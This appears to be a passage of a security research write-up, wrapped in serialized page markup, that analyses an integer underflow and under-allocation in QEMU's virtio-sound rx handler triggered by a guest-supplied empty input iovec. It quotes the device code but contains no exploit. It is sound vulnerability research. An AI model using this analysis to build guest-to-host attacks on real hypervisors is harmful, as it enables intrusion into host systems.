VirtQueueElement *elem;\n    [...]\n\n    for (;;) {\n        VirtIOSoundPCMStream *stream;\n\n        elem = virtqueue_pop(vq, sizeof(VirtQueueElement));     // [1]\n        if (!elem) {\n            break;\n        }\n\n        [...]\n\n        WITH_QEMU_LOCK_GUARD(&stream->queue_mutex) {\n            size = iov_size(elem->in_sg, elem->in_num) -\n                sizeof(virtio_snd_pcm_status);                  // [2]\n            buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size);\n            buffer->elem = elem;\n            buffer->vq = vq;\n            buffer->size = 0;\n            buffer->offset = 0;\n            QSIMPLEQ_INSERT_TAIL(&stream->queue, buffer, entry); // [3]\n        }\n        continue;\n\n        [...]\n}\n\n",[123385],{"type":28,"tag":98,"props":123386,"children":123387},{"__ignoreMap":7},[123388,123395,123403,123411,123418,123426,123434,123442,123490,123497,123514,123521,123528,123540,123557,123564,123600,123620,123631,123638,123645,123653,123660,123693,123752,123770,123809,123834,123858,123886,123913,123951,123958,123970,123977,123984],{"type":28,"tag":116,"props":123389,"children":123390},{"class":245,"line":246},[123391],{"type":28,"tag":116,"props":123392,"children":123393},{"style":250},[123394],{"type":33,"value":48987},{"type":28,"tag":116,"props":123396,"children":123397},{"class":245,"line":256},[123398],{"type":28,"tag":116,"props":123399,"children":123400},{"style":250},[123401],{"type":33,"value":123402}," * The rx virtqueue handler. Makes the buffers available to their\n",{"type":28,"tag":116,"props":123404,"children":123405},{"class":245,"line":293},[123406],{"type":28,"tag":116,"props":123407,"children":123408},{"style":250},[123409],{"type":33,"value":123410}," * respective streams for consumption.\n",{"type":28,"tag":116,"props":123412,"children":123413},{"class":245,"line":361},[123414],{"type":28,"tag":116,"props":123415,"children":123416},{"style":250},[123417],{"type":33,"value":19152},{"type":28,"tag":116,"props":123419,"children":123420},{"class":245,"line":387},[123421],{"type":28,"tag":116,"props":123422,"children":123423},{"style":250},[123424],{"type":33,"value":123425}," * @vdev: VirtIOSound device\n",{"type":28,"tag":116,"props":123427,"children":123428},{"class":245,"line":400},[123429],{"type":28,"tag":116,"props":123430,"children":123431},{"style":250},[123432],{"type":33,"value":123433}," * @vq: rx virtqueue\n",{"type":28,"tag":116,"props":123435,"children":123436},{"class":245,"line":614},[123437],{"type":28,"tag":116,"props":123438,"children":123439},{"style":250},[123440],{"type":33,"value":123441}," */\n",{"type":28,"tag":116,"props":123443,"children":123444},{"class":245,"line":631},[123445,123449,123453,123458,123463,123467,123472,123477,123481,123486],{"type":28,"tag":116,"props":123446,"children":123447},{"style":376},[123448],{"type":33,"value":50664},{"type":28,"tag":116,"props":123450,"children":123451},{"style":376},[123452],{"type":33,"value":2169},{"type":28,"tag":116,"props":123454,"children":123455},{"style":282},[123456],{"type":33,"value":123457}," virtio_snd_handle_rx_xfer",{"type":28,"tag":116,"props":123459,"children":123460},{"style":266},[123461],{"type":33,"value":123462},"(VirtIODevice ",{"type":28,"tag":116,"props":123464,"children":123465},{"style":370},[123466],{"type":33,"value":4240},{"type":28,"tag":116,"props":123468,"children":123469},{"style":272},[123470],{"type":33,"value":123471},"vdev",{"type":28,"tag":116,"props":123473,"children":123474},{"style":266},[123475],{"type":33,"value":123476},", VirtQueue ",{"type":28,"tag":116,"props":123478,"children":123479},{"style":370},[123480],{"type":33,"value":4240},{"type":28,"tag":116,"props":123482,"children":123483},{"style":272},[123484],{"type":33,"value":123485},"vq",{"type":28,"tag":116,"props":123487,"children":123488},{"style":266},[123489],{"type":33,"value":2830},{"type":28,"tag":116,"props":123491,"children":123492},{"class":245,"line":665},[123493],{"type":28,"tag":116,"props":123494,"children":123495},{"style":266},[123496],{"type":33,"value":10547},{"type":28,"tag":116,"props":123498,"children":123499},{"class":245,"line":713},[123500,123505,123509],{"type":28,"tag":116,"props":123501,"children":123502},{"style":266},[123503],{"type":33,"value":123504},"    VirtQueueElement ",{"type":28,"tag":116,"props":123506,"children":123507},{"style":370},[123508],{"type":33,"value":4240},{"type":28,"tag":116,"props":123510,"children":123511},{"style":266},[123512],{"type":33,"value":123513},"elem;\n",{"type":28,"tag":116,"props":123515,"children":123516},{"class":245,"line":750},[123517],{"type":28,"tag":116,"props":123518,"children":123519},{"style":266},[123520],{"type":33,"value":104414},{"type":28,"tag":116,"props":123522,"children":123523},{"class":245,"line":779},[123524],{"type":28,"tag":116,"props":123525,"children":123526},{"emptyLinePlaceholder":19},[123527],{"type":33,"value":1044},{"type":28,"tag":116,"props":123529,"children":123530},{"class":245,"line":796},[123531,123535],{"type":28,"tag":116,"props":123532,"children":123533},{"style":260},[123534],{"type":33,"value":2703},{"type":28,"tag":116,"props":123536,"children":123537},{"style":266},[123538],{"type":33,"value":123539}," (;;) {\n",{"type":28,"tag":116,"props":123541,"children":123542},{"class":245,"line":847},[123543,123548,123552],{"type":28,"tag":116,"props":123544,"children":123545},{"style":266},[123546],{"type":33,"value":123547},"        VirtIOSoundPCMStream ",{"type":28,"tag":116,"props":123549,"children":123550},{"style":370},[123551],{"type":33,"value":4240},{"type":28,"tag":116,"props":123553,"children":123554},{"style":266},[123555],{"type":33,"value":123556},"stream;\n",{"type":28,"tag":116,"props":123558,"children":123559},{"class":245,"line":898},[123560],{"type":28,"tag":116,"props":123561,"children":123562},{"emptyLinePlaceholder":19},[123563],{"type":33,"value":1044},{"type":28,"tag":116,"props":123565,"children":123566},{"class":245,"line":907},[123567,123572,123576,123581,123586,123590,123595],{"type":28,"tag":116,"props":123568,"children":123569},{"style":266},[123570],{"type":33,"value":123571},"        elem ",{"type":28,"tag":116,"props":123573,"children":123574},{"style":370},[123575],{"type":33,"value":373},{"type":28,"tag":116,"props":123577,"children":123578},{"style":282},[123579],{"type":33,"value":123580}," virtqueue_pop",{"type":28,"tag":116,"props":123582,"children":123583},{"style":266},[123584],{"type":33,"value":123585},"(vq, ",{"type":28,"tag":116,"props":123587,"children":123588},{"style":376},[123589],{"type":33,"value":54946},{"type":28,"tag":116,"props":123591,"children":123592},{"style":266},[123593],{"type":33,"value":123594},"(VirtQueueElement));",{"type":28,"tag":116,"props":123596,"children":123597},{"style":250},[123598],{"type":33,"value":123599},"     // [1]\n",{"type":28,"tag":116,"props":123601,"children":123602},{"class":245,"line":981},[123603,123607,123611,123615],{"type":28,"tag":116,"props":123604,"children":123605},{"style":260},[123606],{"type":33,"value":2943},{"type":28,"tag":116,"props":123608,"children":123609},{"style":266},[123610],{"type":33,"value":269},{"type":28,"tag":116,"props":123612,"children":123613},{"style":370},[123614],{"type":33,"value":20285},{"type":28,"tag":116,"props":123616,"children":123617},{"style":266},[123618],{"type":33,"value":123619},"elem) {\n",{"type":28,"tag":116,"props":123621,"children":123622},{"class":245,"line":1011},[123623,123627],{"type":28,"tag":116,"props":123624,"children":123625},{"style":260},[123626],{"type":33,"value":2969},{"type":28,"tag":116,"props":123628,"children":123629},{"style":266},[123630],{"type":33,"value":384},{"type":28,"tag":116,"props":123632,"children":123633},{"class":245,"line":1029},[123634],{"type":28,"tag":116,"props":123635,"children":123636},{"style":266},[123637],{"type":33,"value":1954},{"type":28,"tag":116,"props":123639,"children":123640},{"class":245,"line":1038},[123641],{"type":28,"tag":116,"props":123642,"children":123643},{"emptyLinePlaceholder":19},[123644],{"type":33,"value":1044},{"type":28,"tag":116,"props":123646,"children":123647},{"class":245,"line":1047},[123648],{"type":28,"tag":116,"props":123649,"children":123650},{"style":266},[123651],{"type":33,"value":123652},"        [...]\n",{"type":28,"tag":116,"props":123654,"children":123655},{"class":245,"line":1071},[123656],{"type":28,"tag":116,"props":123657,"children":123658},{"emptyLinePlaceholder":19},[123659],{"type":33,"value":1044},{"type":28,"tag":116,"props":123661,"children":123662},{"class":245,"line":1137},[123663,123668,123672,123676,123680,123684,123689],{"type":28,"tag":116,"props":123664,"children":123665},{"style":282},[123666],{"type":33,"value":123667},"        WITH_QEMU_LOCK_GUARD",{"type":28,"tag":116,"props":123669,"children":123670},{"style":266},[123671],{"type":33,"value":313},{"type":28,"tag":116,"props":123673,"children":123674},{"style":370},[123675],{"type":33,"value":2780},{"type":28,"tag":116,"props":123677,"children":123678},{"style":272},[123679],{"type":33,"value":1205},{"type":28,"tag":116,"props":123681,"children":123682},{"style":266},[123683],{"type":33,"value":13423},{"type":28,"tag":116,"props":123685,"children":123686},{"style":272},[123687],{"type":33,"value":123688},"queue_mutex",{"type":28,"tag":116,"props":123690,"children":123691},{"style":266},[123692],{"type":33,"value":844},{"type":28,"tag":116,"props":123694,"children":123695},{"class":245,"line":1181},[123696,123701,123705,123710,123714,123718,123722,123727,123731,123735,123739,123744,123748],{"type":28,"tag":116,"props":123697,"children":123698},{"style":266},[123699],{"type":33,"value":123700},"            size ",{"type":28,"tag":116,"props":123702,"children":123703},{"style":370},[123704],{"type":33,"value":373},{"type":28,"tag":116,"props":123706,"children":123707},{"style":282},[123708],{"type":33,"value":123709}," iov_size",{"type":28,"tag":116,"props":123711,"children":123712},{"style":266},[123713],{"type":33,"value":313},{"type":28,"tag":116,"props":123715,"children":123716},{"style":272},[123717],{"type":33,"value":51682},{"type":28,"tag":116,"props":123719,"children":123720},{"style":266},[123721],{"type":33,"value":13423},{"type":28,"tag":116,"props":123723,"children":123724},{"style":272},[123725],{"type":33,"value":123726},"in_sg",{"type":28,"tag":116,"props":123728,"children":123729},{"style":266},[123730],{"type":33,"value":825},{"type":28,"tag":116,"props":123732,"children":123733},{"style":272},[123734],{"type":33,"value":51682},{"type":28,"tag":116,"props":123736,"children":123737},{"style":266},[123738],{"type":33,"value":13423},{"type":28,"tag":116,"props":123740,"children":123741},{"style":272},[123742],{"type":33,"value":123743},"in_num",{"type":28,"tag":116,"props":123745,"children":123746},{"style":266},[123747],{"type":33,"value":1609},{"type":28,"tag":116,"props":123749,"children":123750},{"style":370},[123751],{"type":33,"value":50481},{"type":28,"tag":116,"props":123753,"children":123754},{"class":245,"line":1212},[123755,123760,123765],{"type":28,"tag":116,"props":123756,"children":123757},{"style":376},[123758],{"type":33,"value":123759},"                sizeof",{"type":28,"tag":116,"props":123761,"children":123762},{"style":266},[123763],{"type":33,"value":123764},"(virtio_snd_pcm_status);",{"type":28,"tag":116,"props":123766,"children":123767},{"style":250},[123768],{"type":33,"value":123769},"                  // [2]\n",{"type":28,"tag":116,"props":123771,"children":123772},{"class":245,"line":1254},[123773,123778,123782,123787,123791,123795,123800,123804],{"type":28,"tag":116,"props":123774,"children":123775},{"style":266},[123776],{"type":33,"value":123777},"            buffer ",{"type":28,"tag":116,"props":123779,"children":123780},{"style":370},[123781],{"type":33,"value":373},{"type":28,"tag":116,"props":123783,"children":123784},{"style":282},[123785],{"type":33,"value":123786}," g_malloc0",{"type":28,"tag":116,"props":123788,"children":123789},{"style":266},[123790],{"type":33,"value":313},{"type":28,"tag":116,"props":123792,"children":123793},{"style":376},[123794],{"type":33,"value":54946},{"type":28,"tag":116,"props":123796,"children":123797},{"style":266},[123798],{"type":33,"value":123799},"(VirtIOSoundPCMBuffer) ",{"type":28,"tag":116,"props":123801,"children":123802},{"style":370},[123803],{"type":33,"value":2268},{"type":28,"tag":116,"props":123805,"children":123806},{"style":266},[123807],{"type":33,"value":123808}," size);\n",{"type":28,"tag":116,"props":123810,"children":123811},{"class":245,"line":1262},[123812,123817,123821,123825,123829],{"type":28,"tag":116,"props":123813,"children":123814},{"style":272},[123815],{"type":33,"value":123816},"            buffer",{"type":28,"tag":116,"props":123818,"children":123819},{"style":266},[123820],{"type":33,"value":13423},{"type":28,"tag":116,"props":123822,"children":123823},{"style":272},[123824],{"type":33,"value":51682},{"type":28,"tag":116,"props":123826,"children":123827},{"style":370},[123828],{"type":33,"value":2226},{"type":28,"tag":116,"props":123830,"children":123831},{"style":266},[123832],{"type":33,"value":123833}," elem;\n",{"type":28,"tag":116,"props":123835,"children":123836},{"class":245,"line":1294},[123837,123841,123845,123849,123853],{"type":28,"tag":116,"props":123838,"children":123839},{"style":272},[123840],{"type":33,"value":123816},{"type":28,"tag":116,"props":123842,"children":123843},{"style":266},[123844],{"type":33,"value":13423},{"type":28,"tag":116,"props":123846,"children":123847},{"style":272},[123848],{"type":33,"value":123485},{"type":28,"tag":116,"props":123850,"children":123851},{"style":370},[123852],{"type":33,"value":2226},{"type":28,"tag":116,"props":123854,"children":123855},{"style":266},[123856],{"type":33,"value":123857}," vq;\n",{"type":28,"tag":116,"props":123859,"children":123860},{"class":245,"line":1334},[123861,123865,123869,123874,123878,123882],{"type":28,"tag":116,"props":123862,"children":123863},{"style":272},[123864],{"type":33,"value":123816},{"type":28,"tag":116,"props":123866,"children":123867},{"style":266},[123868],{"type":33,"value":13423},{"type":28,"tag":116,"props":123870,"children":123871},{"style":272},[123872],{"type":33,"value":123873},"size",{"type":28,"tag":116,"props":123875,"children":123876},{"style":370},[123877],{"type":33,"value":2226},{"type":28,"tag":116,"props":123879,"children":123880},{"style":350},[123881],{"type":33,"value":2718},{"type":28,"tag":116,"props":123883,"children":123884},{"style":266},[123885],{"type":33,"value":384},{"type":28,"tag":116,"props":123887,"children":123888},{"class":245,"line":1372},[123889,123893,123897,123901,123905,123909],{"type":28,"tag":116,"props":123890,"children":123891},{"style":272},[123892],{"type":33,"value":123816},{"type":28,"tag":116,"props":123894,"children":123895},{"style":266},[123896],{"type":33,"value":13423},{"type":28,"tag":116,"props":123898,"children":123899},{"style":272},[123900],{"type":33,"value":13567},{"type":28,"tag":116,"props":123902,"children":123903},{"style":370},[123904],{"type":33,"value":2226},{"type":28,"tag":116,"props":123906,"children":123907},{"style":350},[123908],{"type":33,"value":2718},{"type":28,"tag":116,"props":123910,"children":123911},{"style":266},[123912],{"type":33,"value":384},{"type":28,"tag":116,"props":123914,"children":123915},{"class":245,"line":1381},[123916,123921,123925,123929,123933,123937,123942,123947],{"type":28,"tag":116,"props":123917,"children":123918},{"style":282},[123919],{"type":33,"value":123920},"            QSIMPLEQ_INSERT_TAIL",{"type":28,"tag":116,"props":123922,"children":123923},{"style":266},[123924],{"type":33,"value":313},{"type":28,"tag":116,"props":123926,"children":123927},{"style":370},[123928],{"type":33,"value":2780},{"type":28,"tag":116,"props":123930,"children":123931},{"style":272},[123932],{"type":33,"value":1205},{"type":28,"tag":116,"props":123934,"children":123935},{"style":266},[123936],{"type":33,"value":13423},{"type":28,"tag":116,"props":123938,"children":123939},{"style":272},[123940],{"type":33,"value":123941},"queue",{"type":28,"tag":116,"props":123943,"children":123944},{"style":266},[123945],{"type":33,"value":123946},", buffer, entry);",{"type":28,"tag":116,"props":123948,"children":123949},{"style":250},[123950],{"type":33,"value":52247},{"type":28,"tag":116,"props":123952,"children":123953},{"class":245,"line":1389},[123954],{"type":28,"tag":116,"props":123955,"children":123956},{"style":266},[123957],{"type":33,"value":1954},{"type":28,"tag":116,"props":123959,"children":123960},{"class":245,"line":1425},[123961,123966],{"type":28,"tag":116,"props":123962,"children":123963},{"style":260},[123964],{"type":33,"value":123965},"        continue",{"type":28,"tag":116,"props":123967,"children":123968},{"style":266},[123969],{"type":33,"value":384},{"type":28,"tag":116,"props":123971,"children":123972},{"class":245,"line":1448},[123973],{"type":28,"tag":116,"props":123974,"children":123975},{"emptyLinePlaceholder":19},[123976],{"type":33,"value":1044},{"type":28,"tag":116,"props":123978,"children":123979},{"class":245,"line":1456},[123980],{"type":28,"tag":116,"props":123981,"children":123982},{"style":266},[123983],{"type":33,"value":123652},{"type":28,"tag":116,"props":123985,"children":123986},{"class":245,"line":1520},[123987],{"type":28,"tag":116,"props":123988,"children":123989},{"style":266},[123990],{"type":33,"value":406},{"type":28,"tag":29,"props":123992,"children":123993},{},[123994,123996,124002,124004,124010,124012,124017,124018,124024],{"type":33,"value":123995},"At ",{"type":28,"tag":98,"props":123997,"children":123999},{"className":123998},[],[124000],{"type":33,"value":124001},"[1]",{"type":33,"value":124003},", a ",{"type":28,"tag":98,"props":124005,"children":124007},{"className":124006},[],[124008],{"type":33,"value":124009},"VirtQueueElement *elem",{"type":33,"value":124011}," is popped from the virtqueue. It contains the ",{"type":28,"tag":98,"props":124013,"children":124015},{"className":124014},[],[124016],{"type":33,"value":123726},{"type":33,"value":10659},{"type":28,"tag":98,"props":124019,"children":124021},{"className":124020},[],[124022],{"type":33,"value":124023},"out_sg",{"type":33,"value":124025}," iovecs that describe the guest request, and is therefore fully guest-controlled.",{"type":28,"tag":29,"props":124027,"children":124028},{},[124029,124031,124037,124039,124045,124047,124053,124055,124061,124063,124069],{"type":33,"value":124030},"Further at ",{"type":28,"tag":98,"props":124032,"children":124034},{"className":124033},[],[124035],{"type":33,"value":124036},"[2]",{"type":33,"value":124038},", the device computes the size of the data buffer as ",{"type":28,"tag":98,"props":124040,"children":124042},{"className":124041},[],[124043],{"type":33,"value":124044},"iov_size(elem->in_sg, elem->in_num) - sizeof(virtio_snd_pcm_status)",{"type":33,"value":124046},". That value is then used in the allocation: ",{"type":28,"tag":98,"props":124048,"children":124050},{"className":124049},[],[124051],{"type":33,"value":124052},"g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size)",{"type":33,"value":124054},". Finally, at ",{"type":28,"tag":98,"props":124056,"children":124058},{"className":124057},[],[124059],{"type":33,"value":124060},"[3]",{"type":33,"value":124062},", the newly allocated buffer is appended to the ",{"type":28,"tag":98,"props":124064,"children":124066},{"className":124065},[],[124067],{"type":33,"value":124068},"stream->queue",{"type":33,"value":124070}," linked list.",{"type":28,"tag":29,"props":124072,"children":124073},{},[124074,124076,124081,124083,124088,124090,124095,124097,124103],{"type":33,"value":124075},"Because both the ",{"type":28,"tag":98,"props":124077,"children":124079},{"className":124078},[],[124080],{"type":33,"value":123726},{"type":33,"value":124082}," iovec and the ",{"type":28,"tag":98,"props":124084,"children":124086},{"className":124085},[],[124087],{"type":33,"value":123743},{"type":33,"value":124089}," field are guest-controlled, and there is no check that the total ",{"type":28,"tag":98,"props":124091,"children":124093},{"className":124092},[],[124094],{"type":33,"value":123726},{"type":33,"value":124096}," size is at least ",{"type":28,"tag":98,"props":124098,"children":124100},{"className":124099},[],[124101],{"type":33,"value":124102},"sizeof(virtio_snd_pcm_status)",{"type":33,"value":124104},", this calculation can underflow if the guest provides a smaller input buffer - that gives us our first bug.",{"type":28,"tag":29,"props":124106,"children":124107},{},[124108,124110,124115,124117,124123,124125,124131,124133,124139],{"type":33,"value":124109},"From the guest driver, we can provide an empty ",{"type":28,"tag":98,"props":124111,"children":124113},{"className":124112},[],[124114],{"type":33,"value":123726},{"type":33,"value":124116}," iovec. In that case, the calculation becomes ",{"type":28,"tag":98,"props":124118,"children":124120},{"className":124119},[],[124121],{"type":33,"value":124122},"0 - sizeof(virtio_snd_pcm_status)",{"type":33,"value":124124},", so the allocation size effectively becomes ",{"type":28,"tag":98,"props":124126,"children":124128},{"className":124127},[],[124129],{"type":33,"value":124130},"sizeof(VirtIOSoundPCMBuffer) - 8",{"type":33,"value":124132},". Given the definition of ",{"type":28,"tag":98,"props":124134,"children":124136},{"className":124135},[],[124137],{"type":33,"value":124138},"VirtIOSoundPCMBuffer",{"type":33,"value":4160},{"type":28,"tag":234,"props":124141,"children":124143},{"code":124142,"language":1797,"meta":7,"className":16176,"style":7},"struct VirtIOSoundPCMBuffer {\n    QSIMPLEQ_ENTRY(VirtIOSoundPCMBuffer) entry;\n    VirtQueueElement *elem;\n    VirtQueue *vq;\n    size_t size;\n    uint64_t offset;\n    /* Used for the TX queue for lazy I/O copy from `elem` */\n    bool populated;\n    uint8_t data[];\n};\n",[124144],{"type":28,"tag":98,"props":124145,"children":124146},{"__ignoreMap":7},[124147,124159,124172,124187,124204,124216,124228,124236,124248,124268],{"type":28,"tag":116,"props":124148,"children":124149},{"class":245,"line":246},[124150,124154],{"type":28,"tag":116,"props":124151,"children":124152},{"style":376},[124153],{"type":33,"value":9069},{"type":28,"tag":116,"props":124155,"children":124156},{"style":266},[124157],{"type":33,"value":124158}," VirtIOSoundPCMBuffer {\n",{"type":28,"tag":116,"props":124160,"children":124161},{"class":245,"line":256},[124162,124167],{"type":28,"tag":116,"props":124163,"children":124164},{"style":282},[124165],{"type":33,"value":124166},"    QSIMPLEQ_ENTRY",{"type":28,"tag":116,"props":124168,"children":124169},{"style":266},[124170],{"type":33,"value":124171},"(VirtIOSoundPCMBuffer) entry;\n",{"type":28,"tag":116,"props":124173,"children":124174},{"class":245,"line":293},[124175,124179,124183],{"type":28,"tag":116,"props":124176,"children":124177},{"style":266},[124178],{"type":33,"value":123504},{"type":28,"tag":116,"props":124180,"children":124181},{"style":370},[124182],{"type":33,"value":4240},{"type":28,"tag":116,"props":124184,"children":124185},{"style":266},[124186],{"type":33,"value":123513},{"type":28,"tag":116,"props":124188,"children":124189},{"class":245,"line":361},[124190,124195,124199],{"type":28,"tag":116,"props":124191,"children":124192},{"style":266},[124193],{"type":33,"value":124194},"    VirtQueue ",{"type":28,"tag":116,"props":124196,"children":124197},{"style":370},[124198],{"type":33,"value":4240},{"type":28,"tag":116,"props":124200,"children":124201},{"style":266},[124202],{"type":33,"value":124203},"vq;\n",{"type":28,"tag":116,"props":124205,"children":124206},{"class":245,"line":387},[124207,124211],{"type":28,"tag":116,"props":124208,"children":124209},{"style":376},[124210],{"type":33,"value":16226},{"type":28,"tag":116,"props":124212,"children":124213},{"style":266},[124214],{"type":33,"value":124215}," size;\n",{"type":28,"tag":116,"props":124217,"children":124218},{"class":245,"line":400},[124219,124223],{"type":28,"tag":116,"props":124220,"children":124221},{"style":376},[124222],{"type":33,"value":55231},{"type":28,"tag":116,"props":124224,"children":124225},{"style":266},[124226],{"type":33,"value":124227}," offset;\n",{"type":28,"tag":116,"props":124229,"children":124230},{"class":245,"line":614},[124231],{"type":28,"tag":116,"props":124232,"children":124233},{"style":250},[124234],{"type":33,"value":124235},"    /* Used for the TX queue for lazy I/O copy from `elem` */\n",{"type":28,"tag":116,"props":124237,"children":124238},{"class":245,"line":631},[124239,124243],{"type":28,"tag":116,"props":124240,"children":124241},{"style":376},[124242],{"type":33,"value":46098},{"type":28,"tag":116,"props":124244,"children":124245},{"style":266},[124246],{"type":33,"value":124247}," populated;\n",{"type":28,"tag":116,"props":124249,"children":124250},{"class":245,"line":665},[124251,124255,124259,124264],{"type":28,"tag":116,"props":124252,"children":124253},{"style":376},[124254],{"type":33,"value":58075},{"type":28,"tag":116,"props":124256,"children":124257},{"style":266},[124258],{"type":33,"value":14768},{"type":28,"tag":116,"props":124260,"children":124261},{"style":376},[124262],{"type":33,"value":124263},"[]",{"type":28,"tag":116,"props":124265,"children":124266},{"style":266},[124267],{"type":33,"value":384},{"type":28,"tag":116,"props":124269,"children":124270},{"class":245,"line":713},[124271],{"type":28,"tag":116,"props":124272,"children":124273},{"style":266},[124274],{"type":33,"value":16239},{"type":28,"tag":29,"props":124276,"children":124277},{},[124278,124280,124286,124288,124293,124295,124300,124302,124307,124309,124314,124316,124322],{"type":33,"value":124279},"That under-allocation removes the ",{"type":28,"tag":98,"props":124281,"children":124283},{"className":124282},[],[124284],{"type":33,"value":124285},"populated",{"type":33,"value":124287}," field along with the variable-sized ",{"type":28,"tag":98,"props":124289,"children":124291},{"className":124290},[],[124292],{"type":33,"value":3372},{"type":33,"value":124294}," array. As the comment says, ",{"type":28,"tag":98,"props":124296,"children":124298},{"className":124297},[],[124299],{"type":33,"value":124285},{"type":33,"value":124301}," is only relevant to the TX path and is not used for audio input. However, by making the iovec size ",{"type":28,"tag":98,"props":124303,"children":124305},{"className":124304},[],[124306],{"type":33,"value":1824},{"type":33,"value":124308},", the device believes data should be ",{"type":28,"tag":98,"props":124310,"children":124312},{"className":124311},[],[124313],{"type":33,"value":1824},{"type":33,"value":124315}," byte, while the actual allocation is ",{"type":28,"tag":98,"props":124317,"children":124319},{"className":124318},[],[124320],{"type":33,"value":124321},"sizeof(VirtIOSoundPCMBuffer) - 7",{"type":33,"value":141},{"type":28,"tag":443,"props":124324,"children":124326},{"id":124325},"populating-data-buffers",[124327],{"type":33,"value":124328},"Populating Data Buffers",{"type":28,"tag":29,"props":124330,"children":124331},{},[124332],{"type":33,"value":124333},"Let's take a look at how the allocated data buffer for the input stream is filled:",{"type":28,"tag":234,"props":124335,"children":124337},{"code":124336,"language":1797,"meta":7,"className":16176,"style":7},"/*\n * AUD_* input callback.\n *\n * @data: VirtIOSoundPCMStream stream\n * @available: number of bytes that can be read with AUD_read()\n */\nstatic void virtio_snd_pcm_in_cb(void *data, int available)\n{\n    VirtIOSoundPCMStream *stream = data;\n    VirtIOSoundPCMBuffer *buffer;\n    size_t size, max_size;\n\n    WITH_QEMU_LOCK_GUARD(&stream->queue_mutex) {\n        while (!QSIMPLEQ_EMPTY(&stream->queue)) {\n            buffer = QSIMPLEQ_FIRST(&stream->queue);\n\n            [...]\n\n            max_size = iov_size(                    // [1]\n                buffer->elem->in_sg,\n                buffer->elem->in_num\n            );\n            for (;;) {\n                if (buffer->size >= max_size) {     // [2]\n                    return_rx_buffer(stream, buffer);\n                    break;\n                }\n                size = AUD_read(stream->voice.in,\n                        buffer->data + buffer->size,\n                        MIN(available, (stream->params.period_bytes -     // [3]\n                                        buffer->size)));\n                if (!size) {\n                    available = 0;\n                    break;\n                }\n                buffer->size += size;\n                available -= size;\n                [...]\n            }\n        }\n    }\n}\n",[124338],{"type":28,"tag":98,"props":124339,"children":124340},{"__ignoreMap":7},[124341,124348,124356,124363,124371,124379,124386,124435,124442,124468,124485,124497,124504,124536,124581,124621,124628,124636,124643,124668,124696,124720,124728,124740,124778,124791,124803,124810,124856,124893,124936,124957,124977,124997,125008,125015,125038,125054,125062,125069,125076,125083],{"type":28,"tag":116,"props":124342,"children":124343},{"class":245,"line":246},[124344],{"type":28,"tag":116,"props":124345,"children":124346},{"style":250},[124347],{"type":33,"value":48987},{"type":28,"tag":116,"props":124349,"children":124350},{"class":245,"line":256},[124351],{"type":28,"tag":116,"props":124352,"children":124353},{"style":250},[124354],{"type":33,"value":124355}," * AUD_* input callback.\n",{"type":28,"tag":116,"props":124357,"children":124358},{"class":245,"line":293},[124359],{"type":28,"tag":116,"props":124360,"children":124361},{"style":250},[124362],{"type":33,"value":19152},{"type":28,"tag":116,"props":124364,"children":124365},{"class":245,"line":361},[124366],{"type":28,"tag":116,"props":124367,"children":124368},{"style":250},[124369],{"type":33,"value":124370}," * @data: VirtIOSoundPCMStream stream\n",{"type":28,"tag":116,"props":124372,"children":124373},{"class":245,"line":387},[124374],{"type":28,"tag":116,"props":124375,"children":124376},{"style":250},[124377],{"type":33,"value":124378}," * @available: number of bytes that can be read with AUD_read()\n",{"type":28,"tag":116,"props":124380,"children":124381},{"class":245,"line":400},[124382],{"type":28,"tag":116,"props":124383,"children":124384},{"style":250},[124385],{"type":33,"value":123441},{"type":28,"tag":116,"props":124387,"children":124388},{"class":245,"line":614},[124389,124393,124397,124402,124406,124410,124414,124418,124422,124426,124431],{"type":28,"tag":116,"props":124390,"children":124391},{"style":376},[124392],{"type":33,"value":50664},{"type":28,"tag":116,"props":124394,"children":124395},{"style":376},[124396],{"type":33,"value":2169},{"type":28,"tag":116,"props":124398,"children":124399},{"style":282},[124400],{"type":33,"value":124401}," virtio_snd_pcm_in_cb",{"type":28,"tag":116,"props":124403,"children":124404},{"style":266},[124405],{"type":33,"value":313},{"type":28,"tag":116,"props":124407,"children":124408},{"style":376},[124409],{"type":33,"value":51245},{"type":28,"tag":116,"props":124411,"children":124412},{"style":370},[124413],{"type":33,"value":9484},{"type":28,"tag":116,"props":124415,"children":124416},{"style":272},[124417],{"type":33,"value":3372},{"type":28,"tag":116,"props":124419,"children":124420},{"style":266},[124421],{"type":33,"value":825},{"type":28,"tag":116,"props":124423,"children":124424},{"style":376},[124425],{"type":33,"value":18710},{"type":28,"tag":116,"props":124427,"children":124428},{"style":272},[124429],{"type":33,"value":124430}," available",{"type":28,"tag":116,"props":124432,"children":124433},{"style":266},[124434],{"type":33,"value":2830},{"type":28,"tag":116,"props":124436,"children":124437},{"class":245,"line":631},[124438],{"type":28,"tag":116,"props":124439,"children":124440},{"style":266},[124441],{"type":33,"value":10547},{"type":28,"tag":116,"props":124443,"children":124444},{"class":245,"line":665},[124445,124450,124454,124459,124463],{"type":28,"tag":116,"props":124446,"children":124447},{"style":266},[124448],{"type":33,"value":124449},"    VirtIOSoundPCMStream ",{"type":28,"tag":116,"props":124451,"children":124452},{"style":370},[124453],{"type":33,"value":4240},{"type":28,"tag":116,"props":124455,"children":124456},{"style":266},[124457],{"type":33,"value":124458},"stream ",{"type":28,"tag":116,"props":124460,"children":124461},{"style":370},[124462],{"type":33,"value":373},{"type":28,"tag":116,"props":124464,"children":124465},{"style":266},[124466],{"type":33,"value":124467}," data;\n",{"type":28,"tag":116,"props":124469,"children":124470},{"class":245,"line":713},[124471,124476,124480],{"type":28,"tag":116,"props":124472,"children":124473},{"style":266},[124474],{"type":33,"value":124475},"    VirtIOSoundPCMBuffer ",{"type":28,"tag":116,"props":124477,"children":124478},{"style":370},[124479],{"type":33,"value":4240},{"type":28,"tag":116,"props":124481,"children":124482},{"style":266},[124483],{"type":33,"value":124484},"buffer;\n",{"type":28,"tag":116,"props":124486,"children":124487},{"class":245,"line":750},[124488,124492],{"type":28,"tag":116,"props":124489,"children":124490},{"style":376},[124491],{"type":33,"value":16226},{"type":28,"tag":116,"props":124493,"children":124494},{"style":266},[124495],{"type":33,"value":124496}," size, max_size;\n",{"type":28,"tag":116,"props":124498,"children":124499},{"class":245,"line":779},[124500],{"type":28,"tag":116,"props":124501,"children":124502},{"emptyLinePlaceholder":19},[124503],{"type":33,"value":1044},{"type":28,"tag":116,"props":124505,"children":124506},{"class":245,"line":796},[124507,124512,124516,124520,124524,124528,124532],{"type":28,"tag":116,"props":124508,"children":124509},{"style":282},[124510],{"type":33,"value":124511},"    